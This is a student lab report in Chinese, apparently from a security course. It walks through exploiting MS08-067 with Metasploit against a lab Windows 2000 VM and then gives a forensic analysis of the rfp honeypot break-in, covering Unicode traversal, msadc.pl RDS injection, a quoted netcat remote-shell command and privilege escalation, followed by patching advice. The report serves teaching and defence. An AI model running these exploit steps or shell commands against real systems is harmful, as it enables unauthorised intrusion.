目录
一.实验介绍
1.Metasploit
Metasploit全称The Metasploit Framework,是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击,并且它附带数百个已知软件漏洞的专业级漏洞攻击工具。这个框架高度模块化,即框架由多个module组成,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。此框架涵盖了渗透测试中全过程,用户可以在这个框架下利用现有的Payload进行一系列的渗透测试。
2.NT系统
NT即New Technology之意,Windows NT主要是为客户机/服务器而设计的操作系统。
3.渗透的概念
渗透是攻击者常用的一种攻击手段,也是一种综合的高级攻击技术,同时渗透也是安全工作者所研究的一个课题,在他们口中通常被称为”渗透测试(Penetration Test)”。无论是网络渗透(Network Penetration)还是渗透测试(Penetration Test),其实际上所指的都是同一内容,也就是研究如何一步步攻击入侵某个大型网络主机服务器群组。只不过从实施的角度上看,前者是攻击者的恶意行为,而后者则是安全工作者模拟入侵攻击测试,进而寻找最佳安全防护方案的正当手段。
网络渗透攻击与普通攻击的不同,网络渗透攻击与普通网络攻击的不同在于,普通的网络攻击只是单一类型的攻击。例如,在普通的网络攻击事件中,攻击者可能仅仅是利用目标网络的Web服务器漏洞,入侵网站更改网页,或者在网页上挂马。也就是说,这种攻击是随机的,而其目的也是单一而简单的。网络渗透攻击则与此不同,它是一种系统渐进型的综合攻击方式,其攻击目标是明确的,攻击目的往往不那么单一,危害性也非常严重。
例如,攻击者会有针对性地对某个目标网络进行攻击,以获取其内部的商业资料,进行网络破坏等。因此,攻击者实施攻击的步骤是非常系统的,假设其获取了目标网络中网站服务器的权限,则不会仅满足于控制此台服务器,而是会利用此台服务器,继续入侵目标网络,获取整个网络中所有主机的权限。为了实现渗透攻击,攻击者采用的攻击方式绝不仅此于一种简单的Web脚本漏洞攻击。攻击者会综合运用远程溢出、木马攻击、密码破解、嗅探、ARP欺骗等多种攻击方式,逐步控制网络。
总体来说,与普通网络攻击相比,网络渗透攻击具有几个特性:攻击目的的明确性,攻击步骤的逐步与渐进性,攻击手段的多样性和综合性。
二.实验过程
1.动手实践Metasploit windows attacker
任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权。
1)在 Kali 攻击机终端使用以下命令进入 Metasploit:
sudo apt-get install metasploit-framework
msfconsole
输入use exploit/windows/smb/ms08_067_netapi使用相关攻击脚本,使用show payloads显示可用的攻击负载,set payload generic/shell_reverse_tcp选择你要用的攻击负载模块:
使用show options查看需要设置的参数:
使用set RHOST 192.168.13.9设置靶机为win2k,set LHOST 192.168.13.8设置攻击机为kali,再show options查看是否配置成功,如图:
输入exploit开始攻击,要注意目标主机的445端口要开放,查看445端口是否开放之后,如果没有开放,则需要开启445端口。攻击成功之后输入若干命令进行测试:
可以使用Wireshark捕获攻击过程产生的数据包:
2.取证分析实践:解码一次成功的NT系统破解攻击
[ 来自213.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
1、攻击者使用了什么破解工具进行攻击
2、攻击者如何使用这个破解工具进入并控制了系统
3、攻击者获得系统访问权限后做了什么
4、我们如何防止这样的攻击
5、你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么 ]
使用wireshark打开snort-0204@0117.log,大致浏览文件后,可以发现日志文件由以下内容组成:
可识别的HTTP协议内容
可识别的SQL语言代码内容
可识别的系统操作代码内容
不可识别的数据(二进制数据)
(1)攻击者使用了什么破解工具进行攻击
问题解答:攻击者利用了Unicode攻击(针对MS00-078/MS01-026)和针对msadcs.dll中RDS漏洞(MS02-065)的msadc.pl/msadc2.pl 渗透攻击工具进行了攻击。
分析:
追踪HTTP数据流,可以找到特殊字符%C0%AF,在Unicode编码中对应符号/,因此可以推测存在UNICODE编码漏洞攻击,说明攻击者通过IIS Unicode漏洞了解了被攻击主机操作系统的一些基本情况:
再往下,可以看到攻击者试图向服务器获取一个msadcs.dll文件:
攻击者利用这个dll存在RDS漏洞,输入了个数据查询语句进行SQL注入攻击。根据“ADM!ROX!YOUR!WORLD”特征字符串,以及查询语句中使用了dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb,通过查询可以知道到它是由rain forest puppy 编写的 msadc(2).pl渗透攻击代码发起的
至此,攻击者通过查点确认了目标系统提供 Web 服务的是IIS v4.0,并存在Unicode和RDS安全漏洞,可进行进一步渗透攻击。
(2)攻击者如何使用这个破解工具进入并控制了系统
观察到每次 RDS 渗透攻击间的间隔时间均为 6秒左右,可以推测攻击者是预先写好需执行的 shell 指令列表,然后由 msadc(2).pl 渗透攻击工具一起执行。可以发现攻击者并没有成功,之后便又开始转向 Unicode 攻击,每条请求间隔时间大概在 10-12 秒,意味着指令可能是由攻击者手工输入的。
攻击者就成功进入了系统之后,继续往下看,可以发现攻击者建立了一个ftp连接,但是可以看到请求间隔时间大概在 10-12 秒,意味着这些指令可能是由攻击者手工输入的,而且输入了多次才输入正确。
蜜罐主机连接 213.116.251.162 并下载了所指定的这些文件,并通过 nc构建其一个远程 shell 通道。cmd1.exe /c nc -l -p 6969 -e cmd1.exe接着,攻击者连接 6969 端口,获得了访问权,并进入了交互式控制阶段
(3)攻击者获得系统访问权限后做了什么
从下图的tcp流可以看到攻击者的行为:
对目标主机的文件系统进行了嗅探并删除了一些文件:
并试图通过删除SAM数据库中的数据(拷贝和删除har.txt)和将自己加到管理员组中的方式来实现提升自己访问权限的目的
(4)我们如何防止这样的攻击
这个攻击事件中被利用的两个漏洞为RDS和Unicode漏洞,两者都已经有相应的补丁,通过打补丁可防止遭受同样的攻击。不要使用 IIS4.x 这样臭名昭著的 Web Server,如果必须使用 IIS4.x,主要的防范措施有:
为这些漏洞打上补丁,
禁用用不着的 RDS 等服务,
防火墙封禁网络内部服务器发起的连接
为 web server 在单独的文件卷上设置虚拟根目录
使用 NTFS 文件系统,因为 FAT 几乎不提供安全功能
使用 IIS Lockdown 和 URLScan 等工具加强 web serve
(5)你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
攻击者意识到了攻击目标是蜜罐主机,因为他建立了一个文件,并输入了如下内容 C:>echo best honeypot i’ve seen till now 😃 > rfp.txt
因为该目标主机作为 rfp 的个人网站, Web 服务所使用的 IIS 甚至没有更新 rfp 自己所发现的 MDAC RDS安全漏洞,很容易让攻击者意识到这绝对是台诱饵
3.团队对抗实践:windows系统远程渗透攻击和分析
1.攻击实践:
实践环境:
攻击机Kali:172.20.10.7(20222801余酋龙)
靶机Win2k:172.20.10.9(20222806陈旭东)
依照任务一步骤,进行攻击
查看ip检查是否攻击成功
创建文件yql
2.靶机实践:
实践环境:
攻击机Kali:172.20.10.2(20222806陈旭东)
靶机Win2k:172.20.10.12(20222801余酋龙)
查看wireshark捕获的数据包,分析其攻击行为
可以看到其创建的文件
三.学习中遇到的问题及解决
问题1:实验1中总是攻击不成功
问题1解决方案:按照之前的配置,攻击机使用NAT模式,靶机使用仅主机模式,处于不同网段,之后将两台主机调整为同一网段之后便可以进行攻击。
问题2:win2k换成桥接模式后ip地址没有改变,且无法pingtong
之前在配置win2k时将IP地址设置成了手动配置,只需将其改为自动获取IP地址即可
四.实践总结
本次实验动手实践了使用msf渗透主机的过程,了解了这个工具的使用,也仔细分析了一次成功的NT系统破解攻击,帮助自己理解了攻击过程。
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
